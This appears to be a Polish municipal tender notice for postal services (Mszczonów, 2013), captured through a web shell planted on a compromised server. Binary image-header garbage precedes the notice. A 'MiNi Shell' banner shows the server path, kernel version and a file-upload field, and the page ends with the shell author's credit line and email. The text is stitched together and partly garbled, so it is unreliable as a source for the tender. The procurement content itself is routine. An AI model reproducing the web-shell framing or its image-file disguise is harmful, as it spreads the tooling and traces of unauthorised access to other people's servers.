JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130208/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130208/20795-N-2013.html

<p class="kh_header"><b>Mszczonów: Świadczenie usług pocztowych dla Urzędu Miejskiego w Mszczonowie 2013-2014</b><br>
<b>Numer ogłoszenia: 20795 - 2013; data zamieszczenia: 08.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mszczonów , pl. Piłsudskiego 1, 96-320 Mszczonów, woj. mazowieckie, tel. 046 8582840, faks 046 8582843.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mszczonow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pocztowych dla Urzędu Miejskiego w Mszczonowie 2013-2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> <P>1.	Przedmiotem zamówienia jest świadczenie usług pocztowych dla Urzędu Miejskiego w Mszczonowie w obrocie krajowym i zagranicznym zastrzeżonych i niezastrzeżonych (o wadze do 50g i powyżej 50g) wynikających z obowiązujących przepisów prawa, a w szczególności z przepisów opisujących procedury prowadzonych postępowań dot. terminów, sposobu doręczania korespondencji oraz traktowania zwrotnego potwierdzenia odbioru jako dokumentu urzędowego a w szczególności z:

<P>1)	Ustawy   z   dnia  23 listopada 2012r.  Prawo pocztowe  (Dz. U. z 2012r., poz. 
1529),

<P>2)	Rozporządzenie  Ministra  Infrastruktury  z  dnia 9  stycznia 2004r.  w sprawie 
warunków   wykonywania   powszechnych   usług   pocztowych  (Dz. U. z 2004r. Nr 5, poz. 34 ze zm.),

<P>3)	Rozporządzenie   Ministra   Infrastruktury   z   dnia  13  października  2003r. w 
sprawie reklamacji  usługi  pocztowej  w zakresie przesyłki rejestrowanej i przekazu pocztowego (Dz. U. Nr 183, poz. 1795 ze zm.), 
<P>4)	Ustawy z dnia 17 listopada 1964r. Kodeks Postępowania Cywilnego (Dz. U. 
Nr 43, poz. 296 ze zm.),

<P>5)	Ustawy z dnia 16 czerwca 1980r. Kodeks Postępowania Administracyjnego 
(Dz. U. z 2000r. Nr 98, poz. 1071 ze zm.),

<P>6)	Ordynacji podatkowej określonej w ustawie z dnia 29 sierpnia 1997 r. (Dz. U. z 2012 r.  poz. 749  ze zm.),

<P>2.	Zakres świadczonych usług winien obejmować przyjmowanie, przemieszczanie i doręczanie przesyłek listowych i paczek. Przez przesyłki pocztowe, będące przedmiotem zamówienia rozumie się przesyłki listowe i paczki:

<P>1)	Zwykłe   -   przesyłki   listowe    nierejestrowane,    nie    będące   przesyłkami 
najszybszej  kategorii w  obrocie  krajowym  i  zagranicznym,
<P>2)	Zwykłe priorytetowe - przesyłki listowe nierejestrowane najszybszej kategorii 
w obrocie krajowym i zagranicznym,
<P>3)	Polecone   -   przesyłki    listowe    rejestrowane,    nie    będące   przesyłkami
najszybszej  kategorii  w  obrocie  krajowym  i  zagranicznym,

<P>4)	Polecone priorytetowe - przesyłki listowe rejestrowane najszybszej kategorii 
w obrocie krajowym i zagranicznym,
<P>5)	Polecone za zwrotnym potwierdzeniem odbioru (ZPO)  -  przesyłki listowe 
nie  będące  przesyłkami  najszybszej  kategorii  przyjęte   za  potwierdzeniem 
nadania  i  doręczone  za  pokwitowaniem odbioru w obrocie krajowym,
<P>6)	Przesyłki o gabarycie A, to przesyłki listowe o wymiarach:
<P>6.1)	Minimalne wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm.
<P>6.2)	Maksymalne wymiary nie mogą przekroczyć wysokości 20 mm, długości 325 mm i szerokości 230 mm,

<P>7)	Przesyłki o gabarycie B, to przesyłki listowe o wymiarach:
7.1)	Minimalny,  gdy  choć  jeden  z wymiarów przekracza wysokość 20 mm, 
długość 325 mm lub szerokość 230 mm,
<P>7.2)	Maksymalny,  gdy  suma   długości,   szerokości   i   wysokości   wynosi 
900 mm, przy czym największy z tych wymiarów nie może przekroczyć 
600 mm,
<P>8)	Paczki    pocztowe    zwykłe,     to    paczki     rejestrowane,     nie    będące 
paczkami najszybszej kategorii,

<P>9)	Paczki    pocztowe    priorytetowe,    to    paczki   rejestrowane   najszybszej
kategorii,

<P>3.	Zestawienie rodzajowe i ilościowe przesyłek zawiera załącznik nr 1a do SIWZ, który jednocześnie jest załącznikiem obowiązkowo składanym przez Wykonawcę razem z ofertą (załącznik nr 1 do SIWZ). Zamawiający zastrzega, że podane w załączniku 1a ilości przesyłek mają charakter szacunkowy ułatwiający Wykonawcy skalkulowanie ceny ofertowej i nie stanowią ze strony Zamawiającego zobowiązania do nadania przesyłek w podanych ilościach.
<P>Zamawiający zastrzega, że rzeczywiste ilości i rodzaje przesyłek będą wynikać z aktualnych potrzeb Zamawiającego i mogą odbiegać od ilości podanych w zestawieniu.

<P>4.	Ustalenia organizacyjne związane z wykonaniem zamówienia:

<P>1)	Wykonawca  będzie doręczał  przesyłki  krajowe, zaliczone do  powszechnych 
usług pocztowych z zachowaniem wskaźników terminowości doręczeń przesyłek w obrocie krajowym wskazanym w rozporządzeniu Ministra Infrastruktury z dnia 9 stycznia 2004r. w sprawie warunków wykonywania powszechnych usług pocztowych

<P>2)	Wykonawca  będzie  odbierał  przesyłki  przeznaczone  do  nadania z siedziby 
Urzędu  Miejskiego  w  Mszczonowie  i  dostarczał  je  do  placówki nadawczej 
Wykonawcy pięć razy w tygodniu, tj. od poniedziałku do piątku pomiędzy godziną 14:00 - 15:00,

<P>3)	Odbioru    przesyłek    wychodzących     dokonywać      będzie     upoważniony 
przedstawiciel Wykonawcy, po okazaniu stosownego upoważnienia i we własnym zakresie będzie je dostarczał do placówki nadawczej Wykonawcy,

<P>4)	Wynagrodzenie   z   tytułu    wykonywania    przedmiotu    zamówienia   będzie 
rozliczane w okresach rozliczeniowych odpowiadających miesiącom kalendarzowym

<P>5)	Wynagrodzenie  będzie  płatne z dołu, po wykonaniu usługi,

<P>6)	Wynagrodzenie  będzie  płatne  w terminie 14 dni od daty dostarczenia faktury 
VAT,

<P>7)	Wykonawca,  za  wykonaną  usługę  zobowiązany  jest do wystawienia faktury 
VAT w terminie 7 dni od zakończenia okresu rozliczeniowego (obejmującego jeden miesiąc kalendarzowy). Do faktury winno być załączone zestawienie określające ilość i rodzaj faktycznie nadanych przesyłek, paczek oraz przesyłek zwróconych a także sumę należnych Wykonawcy opłat pocztowych.

<P>5.	Obowiązki Wykonawcy przy realizacji przedmiotu zamówienia:

<P>1)	Wykonawca  zobowiązuje  się  do  nadawania przesyłek w dniu ich odbioru od 
Zamawiającego,

<P>2)	Wykonawca    zobowiązuje    się     do   nadawania     przesyłek   do   każdego 
wskazanego   miejsca  w   kraju   i   za   granicą   objętego   porozumieniem ze 
Światowym Związkiem Pocztowym,

<P>3)	Wykonawca   zobowiązuje   się   do  doręczania  do  siedziby  Zamawiającego
pokwitowane przez adresata zwrotne potwierdzenie odbioru, niezwłocznie po dostarczeniu przesyłki. Doręczone potwierdzenie winno zawierać czytelną datę i czytelny podpis odbiorcy. W przypadku nieobecności adresata przedstawiciel Wykonawcy pozostawi zawiadomienie (pierwsze awizo) o próbie doręczenia przesyłki ze wskazaniem gdzie i kiedy adresat może odebrać przesyłkę. Termin do odbioru przesyłki przez adresata wynosi 7 dni licząc od dnia pozostawienia pierwszego zawiadomienia. W przypadku niepodjęcia przesyłki w tym terminie, przesyłka jest wizowana powtórnie poprzez pozostawienie drugiego zawiadomienia o możliwości odbioru przesyłki w terminie nie dłuższym niż 14 dni od pierwszego zawiadomienia. Po upływie terminu odbioru przesyłka winna być zwrócona Zamawiającemu wraz z podaniem przyczyny nie odebrania przez adresata (zgodnie z art. 44 ustawy Kodeks Postępowania Administracyjnego). Koszt zwrotu przesyłki rejestrowanej po wyczerpaniu możliwości doręczenia jest równy kosztowi wysłania przesyłki rejestrowanej według cennika Wykonawcy.

<P>4)	Zamawiający   nie    dopuszcza    stosowania    przez   Wykonawcę   własnych 
opakowań na listy i paczki. Niedopuszczalne jest również doczepianie i przyklejanie przez Wykonawcę różnych przedmiotów i znaków do opakowania listu w celu zwiększenia masy listu.

<P>5)	Wykonawca   zobowiązany   jest   do   dostarczenia   Zamawiającemu  według 
potrzeb druków potwierdzenia odbioru, w tym do przesyłek zagranicznych oraz nalepek adresowych do paczek,

<P>6)	Wykonawca  zobowiązuje  się  do  przyjmowania   reklamacji  Zamawiającego. 
Reklamacje z tytułu niewykonania lub nienależytego wykonania usługi Zamawiający może zgłosić do Wykonawcy po upływie 14-go dnia od dnia nadania przesyłki rejestrowanej, nie później jednak niż 12 miesięcy od jej nadania. Termin udzielenia odpowiedzi na reklamacje nie może przekroczyć 30 dni od dnia otrzymania reklamacji.

<P>7)	Wykonawca   zobowiązany   jest  do  zabezpieczenia  informacji  oraz  danych 
osobowych zebranych w czasie realizacji zamówienia przed dostępem osób nieupoważnionych zgodnie z ustawą z dnia 29 sierpnia 1997r. o ochronie danych osobowych (Dz. U. z 202r. nr 101, poz. 926 ze zm.).

<P>8)	Wykonawca zobowiązany jest do zachowania w tajemnicy wszelkich informacji 
powziętych przy wykonywaniu zamówienia.

<P>9)	Wykonawca  zobowiązany  jest do pełnej odpowiedzialności cywilno - prawnej 
za przyjmowanie, przemieszczanie i doręczanie przesyłek listowych i paczek w trakcie świadczenia usług.

<P>6.	Obowiązki Zamawiającego:

<P>Zamawiający zobowiązuje się do:
<P>1)	nadawania  przesyłek  w formie odpowiadającej wymogom dla danego rodzaju 
	przesyłek,
<P>2)	przygotowania przesyłek listowych do wysyłki zgodnie z zasadami 
	opakowania i oznakowania przesyłek listowych w obrocie krajowym i zagranicznym,
<P>3)	przekazywania   przesyłek   w  stanie   uporządkowanym,    przez   co   należy 
	rozumieć:
<P>	dla przesyłek rejestrowanych - wpisanie przesyłek do książki nadawczej (wg wzoru uzgodnionego z Wykonawcą) prowadzonej w dwóch egzemplarzach, z których oryginał będzie przeznaczony dla Wykonawcy w celach rozliczeniowych, a kopia stanowić będzie potwierdzenie nadania danej partii przesyłek;
<P>	dla przesyłek nierejestrowanych - zestawienie ilościowe przesyłek wg poszczególnych kategorii wagowych (wg wzoru uzgodnionego z Wykonawcą), zaopatrzone w odcisk pieczęci lub stempla firmowego Zamawiającego, sporządzone dla celów rozliczeniowych w dwóch egzemplarzach, z których oryginał będzie przeznaczony dla Wykonawcy w celach rozliczeniowych, a kopia stanowić będzie potwierdzenie nadania danej partii przesyłek.
<P>4)	umieszczania  na  stronie  adresowej  przesyłek  w miejscu przeznaczonym na 
	znak opłaty napisu (nadruku - pieczątki) zgodnie z § 2 pkt 1 lit. d umowy (zał. 
	Nr 2 do SIWZ)
<P>5)	umieszczania    na    przesyłkach    w   sposób    trwały   i  czytelny   informacji 
jednoznacznie  identyfikujących  adresata i nadawcę wraz z właściwym kodem 
pocztowym, jednocześnie określając rodzaj przesyłki (polecona, ze zwrotnym potwierdzeniem odbioru, priorytetowa) oraz adres zwrotny nadawcy na stronie adresowej przesyłki.
<P>6)	używania  do  przesyłek   własnych   kopert   i  opakowań oraz własne druki za 
pokwitowaniem odbioru związanych z postępowaniem administracyjnym, wymagane przepisami postępowania administracyjnego.
<P>7)	umieszczania     na    paczkach    w    sposób    trwały    i   czytelny   informacji 
jednoznacznie identyfikujących adresata i nadawcę wraz z właściwym kodem pocztowym jednocześnie określając rodzaj paczki.
<P>8)	umieszczania    na   paczkach   nalepki adresowej otrzymanej od Wykonawcy. 
<P>Paczki nadawane będą na podstawie wykazu paczek (książki nadawczej) z podaniem ilości paczek. Wykaz będzie sporządzany w dwóch egzemplarzach po jednym dla Wykonawcy (oryginał) i Zamawiającego (kopia)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się  Wykonawcy,  którzy  wykażą,  że  posiadają aktualne zezwolenie na  wykonywanie   działalności   pocztowej    w   zakresie   
przyjmowania,     przemieszczania     i     doręczania    w    obrocie    krajowym
i   zagranicznym   przesyłek,   wydane   przez   Prezesa   Urzędu  Komunikacji  
Elektronicznej   zgodnie  z   art. 6  ustawy  z  dnia  23  listopada 2012r.  Prawo  
Pocztowe  (Dz. U. z 2012r.,  poz. 1529)    lub   oświadczenie    o    ustawowym   
zwolnieniu   z   uzyskania   ww.  zezwolenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na to, iż Zamawiający nie nakłada na Wykonawcę żadnych wymogów dotyczących posiadania przez niego niezbędnej wiedzy i doświadczenia do wykonywania zamówienia warunek ten będzie spełniony przez każdego z Wykonawców po złożeniu oświadczenia - załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na, iż Zamawiający nie nakłada na Wykonawcę żadnych wymogów dotyczących dysponowania potencjałem technicznym warunek ten będzie spełniony przez każdego z Wykonawców po złożeniu oświadczenia - załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na, iż Zamawiający nie nakłada na Wykonawcę żadnych wymogów dotyczących dysponowania osobami zdolnymi do wykonywania zamówienia warunek ten będzie spełniony przez każdego z Wykonawców po złożeniu oświadczenia - załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi przedstawić opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia co najmniej na kwotę 50.000,00 zł. (pięćdziesiąt tysięcy złotych). 
<P>Ocena spełnienia ww. warunków zostanie dokonana wg kryterium spełnia/nie spełnia na podstawie przedłożonych dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p><P>1. Uzupełniony druk oferty, 
<P>2. Podpisane i wypełnione zestawie usług pocztowych, 
<P>3. Inne dokumenty wymienione w SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p><P>a.	w przypadku zmiany adresów lub nazwy Wykonawcy, na skutek zmiany formy organizacyjno-prawnej, przekształcenia lub połączenia Wykonawcy lub zmiany numerów kont podanych w umowie - zmianom ulegną odpowiednie zapisy w umowie.
<P>b.	zmiany wynagrodzenia w przypadku zmiany przepisów o podatkach oraz przepisów prawa w zakresie mającym wpływ na realizację umowy,
<P>c.	konieczności zmiany miejsca realizacji zamówienia jeśli konieczność ta nastąpiła na skutek okoliczności leżących po stronie Zamawiającego lub okoliczności, za które Zamawiający nie ponosi odpowiedzialności (siła wyższa).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mszczonow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Miejski w Mszczonowie, Plac Piłsudskiego 1, 96-320 Mszczonów, pok. 16..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2013 godzina 10:00, miejsce: Informacja Urzędu Miejskiego  w  Mszczonowie  (pokój nr 1 - parter), Plac Piłsudskiego 1, 96-320  Mszczonów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com